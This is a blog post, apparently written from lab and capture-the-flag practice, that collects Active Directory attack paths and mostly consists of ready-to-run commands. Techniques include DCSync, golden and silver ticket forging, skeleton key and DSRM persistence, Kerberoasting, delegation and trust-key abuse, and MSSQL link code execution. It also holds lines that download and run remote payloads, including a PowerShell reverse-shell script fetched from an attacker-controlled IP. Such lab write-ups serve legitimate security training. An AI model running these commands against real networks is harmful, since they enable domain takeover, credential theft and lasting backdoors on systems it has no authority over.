Active Directory Attack paths(with exploitation)(will be updated as I learn more):

tom(left) has WriteOwner rights to claire(middle)

a) Change owner of claire to ourselves(tom)

Set-DomainObjectOwner -Identity claire -OwnerIdentity tom Set-DomainObjectOwner -Identity <target-user> -OwnerIdentity <current-user>

b) Get Reset Password permission.

Add-DomainObjectAcl -TargetIdentity htb\claire -PrincipalIdentity htb\claire -Rights ResetPasswordAdd-DomainObjectAcl -TargetIdentity <target-user> -PrincipalIdentity <target-user> -Rights ResetPassword
Changing ownership

c) Change Password.

Set-DomainObjectOwner -Identity claire -OwnerIdentity tom -verbose
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -verbose
$newpass = ConvertTo-SecureString -String 'P@$$w0rd!1234' -AsPlainText -Force
Set-DomainUserPassword -Identity claire -AccountPassword $newpass -verbose
Changed the password

2. DCSync Attack/Feature abuse:

DC Sync is a feature also known as replication service, allows some privileged accounts to copy/backup DC objects. Like for example members of these groups have Replication permissions enabled by default-

  • Administrators
  • Enterprise Admins

We can add our own unprivileged user here and allow these 3 Replication Directory Changes permissions to allow our user to perform DCSync.

We can also use Powerview’s for adding Replication rights for users-

Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student567 -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose

Example 1-

Here we are using DC sync to extract creds of krbtgt account which can be further used for Golden ticket attack.

C:\AD\Tools\Loader.exe -path http://172.16.100.67/SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"Invoke-Mimikatz -Command '"lsadump::dcsync  /user:dcorp\krbtgt"'

Example 2-

(GetChanges+GetChangesALL=DCSync)

impacket-secretsdump -just-dc mrlky:Football#7@10.10.10.103impacket-secretsdump -just-dc <username>:<password>@10.10.10.103
Exploiting DcSync via impacket

3. Golden Ticket:

Prerequisites-

  • Domain SID
  • Username to impersonate
  • krbtgt account NTLM/AES hash

We use all these things to generate TGTs(Ticket Granting Tickets) for any user. In the below example we are creating TGT for Domain Administrator Acoount.

Finding Domain FQDN-

Get-Domain -Verbose
dollarcorp.moneycorp.local

Finding DomainSID-

Get-DomainSID -Verbose
S-1-5-21-1874506631-3219952063-538504511

Using DCSync to get krbtgt creds-

C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"
e28b3a5c60e087c8489a410a1199235efaf3b9f125972c7a1e7618a7469bfd6a

We can get kerberos policy prior generating ticket-

(Get-DomainPolicyData).KerberosPolicy
#Ticket renew
7 days = 10080 minutes

Finally generating and passing the ticket to current process-

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /aes256:e28b3a5c60e087c8489a410a1199235efaf3b9f125972c7a1e7618a7469bfd6a /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
/startoffset:0 #Ticket will be available after zero minutes
/endin:600 #Ticket lifetime in minutes
/renewmax:10080 #maximum life-time that the ticket can be renewed in minutes

Just for POC we are able to access \\dcorp-dc\c$ share

4. Silver Ticket:

  • Provides access to only particular account on particular machine.

Prerequisites-

  • Domain SID
  • Username to impersonate
  • krbtgt account NTLM/AES hash

Finding Domain FQDN-

Get-Domain -Verbose
dollarcorp.moneycorp.local

Finding DomainSID-

Get-DomainSID -Verbose
S-1-5-21-1874506631-3219952063-538504511

Creds of target service are required-

C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe "sekurlsa::ekeys" "exit"
8c00b6af1f66f9d523807ea84ab5c7384c6107ede32828ed026ef2dcc09d26e6

Generating Silver ticket(for HOST service)-

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /aes256:8c00b6af1f66f9d523807ea84ab5c7384c6107ede32828ed026ef2dcc09d26e6 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

Generating Silver ticket(for RPCSS service)-

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:RPCSS /aes256:8c00b6af1f66f9d523807ea84ab5c7384c6107ede32828ed026ef2dcc09d26e6 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

Generating Silver ticket(for HTTP service)-

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HTTP /aes256:8c00b6af1f66f9d523807ea84ab5c7384c6107ede32828ed026ef2dcc09d26e6 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

5. Skeleton Key(Persistence)-

Making changes in lsass process. Adding a same password for every account.

echo F | xcopy C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat \\dcorp-dc\C$\Users\Public\RunWithRegistryNonAdmin.bat /Yecho F | xcopy C:\AD\Tools\InviShell\InShellProf.dll \\dcorp-dc\C$\Users\Public\InShellProf.dll /YC:\Users\Public\RunWithRegistryNonAdmin.batiex(iwr http://172.16.100.67/Invoke-Mimikatz.ps1 -UseBasicParsing)Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dcorp-dc.dollarcorp.moneycorp.local

Testing-

$pass=ConvertTo-SecureString 'mimikatz' -AsPlainText -Force
$cred=New-Object System.Management.Automation.PSCredential ("dcorp\Administrator", $pass)
Enter-PSSession –Computername dcorp-dc –credential $cred

6. DSRM password(Persistence)-

Administrators set a DC’s DSRM and Recovery Console administrator password during the dcpromo process (i.e., when they’re promoting a Windows server to an AD DC). The DSRM and Recovery Console administrator account is stored in the registry-based Security Accounts Manager (SAM) database of the local DC.

This user’s password is rarely changed.

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
a102ad5753f4c441e3af31c97fad86fd

Enabling network logon for this account.

New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd/run:powershell.exe"'

7. Custom SSP(Security Support Provider)(Persistence)-

SSP is a dll which provides application functionality to get authenticated session. Examples- NTLM, Kerberos, Wdigest, CredSSP

Mimikatz has a mimilib.dll SSP. It logs local logons,
service account and machine account passwords in clear text on the
target(Both DC/Non DC machine).

Invoke-Mimikatz -Command '"misc::memssp"'

Creds are logged into C:\Windows\system32\kiwissp.log

Note: CredentialGuard is bypassed when custom SSP is in use.

8. AdminSDHolder(Persistence)-

The purpose of the AdminSDHolder object is to provide “template” permissions for the protected accounts and groups in the domain. AdminSDHolder is automatically created as an object in the System container of every Active Directory domain. In short it is a backup of ACLs for protected groups. It automatically resets the ACLs for protected groups. List of protected groups-

  • Enterprise Admins
  • Backup Operators
  • Domain Controllers
  • Server Operators
  • Read-only Domain Controllers
  • Print Operators
  • Schema Admins
  • Domain Admins
  • Administrators
  • Replicator

So basically we only need privileges to be able to edit ACLs of AdminSDHolder

We can allow our user via running below commands on DC-

Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc-dollarcorp,dc=moneycorp,dc=local' -PrincipalIdentity student1 -
Rights All -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain
dollarcorp.moneycorp.local -Verbose

Now whatever changes we make to the ACLs that will be periodically updated on the protected groups.

Running AdminSDHolder propogation(update) manually-

Invoke-SDPropagator -timeoutMinutes 1 -showProgress - Verbose

9. ACLs Security Descriptors(Persistence)-

Modifying ACLs to allow non admin users to access securable objects.

A)WMI

Before making any changes -

Set-RemoteWMI -SamAccountName student567 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose

Note: These changes are not logged bydefault

gwmi -class win32_operatingsystem -ComputerName dcorp-dc.dollarcorp.moneycorp.local

After making changes-

B) Similarly we can do the same for Powershell Remoting-

Set-RemotePSRemoting -SamAccountName student567 -ComputerName dcorp-dc -Verbose

Checking changes in DC-

Removing changes-

Set-RemotePSRemoting -SamAccountName student567 -ComputerName dcorp-dc -Verbose -Remove

C) Remote Registry-

Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student1 -Verbose
Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose721a4a3c3720be2730c45a4337b65a0eGet-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose
Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose

10. Kerberoast-

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName#Powerview
Get-DomainUser -SPN

Using Rubeus-

Rubeus.exe kerberoast /user:websvc /simple#Outputs hash of all kerberoastable accounts which supports rc4
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt

Using KerberosRequestorSecurityToken.NET class-

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"

Saving ticket offline from current session.

Invoke-Mimikatz -Command '"kerberos::list /export"'

Abusing GenericWrite rights/Using kerberoasting as Persistence:

sbauer has GenericWrite access over jorden

a) Making Jorden kerberoastable.

Get-ADuser Jorden | Set-ADAccountControl -DoesNotRequirePreAuth $true
Setting DoesNotRequirePreAuth

b) Using impacket’s GetNPUsers to fetch TGT in hashcat crackable format.

impacket-GetNPUsers megacorp.local/jorden -dc-ip 10.10.10.179 -format hashcat

c) Crack the TGT hash.

hashcat -m 18200  hash_TGT_jorden /mnt/hgfs/D/wordlists/rockyou.txt --force

11. Abusing Unconstrained Delegation-

Delegation is a feature which allows to use user credentials again on different server.(kind of user impersonation)

Now in in unconstrained delegation user is allowed to access any resource in domain.

#Powerview
Get-DomainComputer -Unconstrained | select -ExpandProperty name
#AD Module
Get-ADComputer -Filter {TrustedForDelegation -eq $True}

Now If we can compromise this machine which allows unconstrained delegation, We can start listening for TGTs there.

For this scenario we already assume we have compromised the DCORP-APPSRV.

C:\AD\Tools\SafetyKatz.exe "sekurlsa::pth /user:appadmin /domain:dollarcorp.moneycorp.local /aes256:68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb /run:cmd.exe" "exit"echo F | xcopy C:\AD\Tools\Rubeus.exe \\dcorp-appsrv\C$\Users\Public\Rubeus.exe /Ywinrs -r:dcorp-appsrv cmdC:\Users\Public\Rubeus.exe monitor /targetuser:DCORP-DC$ /interval:5 /nowrap

On some other domain joined machine we run-

C:\AD\Tools\MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local

Importing ticket-

C:\AD\Tools\Rubeus.exe ptt /ticket:<encoded_ticket>

Now we have access to all the resources which user dcorp-dc$ can access!

12. Abusing Trust keys to get Enterprise Admins privs(from child to parent domain)-

a) Extracting Trust keys from domain admin of child domain-

Invoke-Mimikatz -Command '"lsadump::trust /patch"'
50e817e622b3b77d4192513fe78bd4b8

b) Generating inter domain TGT-

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local/sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:50e817e622b3b77d4192513fe78bd4b8 /service:krbtgt/target:moneycorp.local/ticket:C:\AD\Tools\trust_tkt.kirbi"'

c) Request TGS for cifs service-

C:\AD\Tools\Rubeus.exe asktgs /ticket:C:\AD\Tools\trust_tkt.kirbi /service:cifs/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt

d) We can request TGS for http service for using PS-remoting-

C:\AD\Tools\Rubeus.exe asktgs /ticket:C:\AD\Tools\trust_tkt.kirbi /service:http/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt

13. Using krbtgt hash of child domain for escalating to parent-

C:\AD\Tools\BetterSafetyKatz.exe  "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local  /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ptt"  "exit"
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"
Invoke-WmiMethod -class Win32_process -name Create -ArgumentList 'powershell iex (iwr -UseBasicParsing http://172.16.100.67/InvokePowerShellTcpEx.ps1)' -ComputerName "mcorp-dc"

14. Abusing Trust keys for accessing services across forests-

Invoke-Mimikatz -Command '"lsadump::trust /patch"'
8b4f8c26e541abc802daf36dfb81c440

Note: We are using rc4 instead of using aes256, because it is not explicitly checked. Please check the images below.

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /rc4:8b4f8c26e541abc802daf36dfb81c440 /service:krbtgt /target:eurocorp.local /ticket:C:\AD\Tools\trust_forest_tkt.kirbi" "exit"
C:\AD\Tools\Rubeus.exe asktgs /ticket:C:\AD\Tools\trust_forest_tkt.kirbi /service:cifs/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt
klist

15. Abusing MSSQL server links in the AD-

Finding SQL server instances.

Get-SQLInstanceDomain -Verbose

Finding SQL server instance where current user has access.

Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose

Finding and Crawling for links-

Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose

Getting RCE on SQLServer where we found sysadmin privs-

Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose -Query "exec master..xp_cmdshell 'whoami'"Invoke-SQLOSCmd -Instance devsrv -Command 'whoami' -Verbose

16. MS14–068 Microsoft Kerberos Checksum Validation Vulnerability:

Prerequisite: One valid user creds and Synchronise time with dc.

net time -S <dc-ip>
C:\Windows\system32>C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878- 1496970234-700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ptt" "exit"
Find current time of dc

Change your time to that specific time to be synchronized.

MS14–068 Metasploit
Proved the vulnerability

Exploitation is possible via via this MIT Credential Cache but, I don’t know how to do that. We will be using impacket’s goldenPac.py exploit script for MS14–068. (I have already already included impacket scripts directory to my path. You may also want to do that :)

Help of goldenPac.py
impacket-goldenPac -dc-ip 10.10.10.52 -target-ip 10.10.10.52 htb.local/james@mantis.htb.local
nt authority\system

17. Abusing SeBackupPrivilege rights:

SeBackupPrivilege

a) robocopy https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#eop---impersonation-privileges

robocopy /b C:\users\administrator\desktop C:\programdata\temp
copy restricted files to programdata\temp

18. Abusing ReadGMSAPassword privileges:

Ted can ReadGMSAPassword.

python3 gMSADumper.py -u <Username> -p <Password> -d <domain>python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy  -d intelligence.htb

And we got the nthash which can be verifed using crackmapexec.

Thank you for reading!

Author: Prabhsimran (https://www.linkedin.com/in/pswalia2u/)

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
n00🔑

n00🔑

Computer Security Enthusiast. Tries to understand how computers work. Would love to hear your suggestions and feedback. https://www.linkedin.com/in/pswalia2u/